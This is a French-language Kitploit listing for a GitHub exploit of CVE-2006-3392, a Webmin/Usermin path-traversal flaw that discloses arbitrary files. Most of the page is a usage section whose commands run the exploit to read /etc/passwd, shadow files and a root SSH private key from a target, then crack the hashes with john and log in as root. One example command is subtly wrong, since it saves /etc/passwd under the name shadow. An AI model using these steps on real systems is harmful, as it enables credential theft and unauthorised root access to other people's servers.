Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - Divulgation arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/g1vi/cve-2006-3392
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - Divulgation arbitraire de fichiers

Voir le dépôt
12il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin avant 1.290 et Usermin avant 1.220 appellent la fonction simplify_path avant de décoder le HTML, ce qui permet à des attaquants distants de lire des fichiers arbitraires, comme démontré avec les séquences "..%01", qui contournent la suppression des séquences "../" avant que des octets tels que "%01" ne soient supprimés du nom de fichier. NOTE : Ce problème est différent de CVE-2006-3274.

Utilisation

Parcourir n'importe quel fichier du système de fichiers avec privilège root

root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>

Exemples

Parcourir passwd et shadow sur 10.10.11.105, exécuter unshadow et craquer les hashs

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed

Parcourir la clé rsa privée sur 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

Licence

N'hésitez pas à utiliser ou modifier quand et où vous voulez

Télécharger l’outil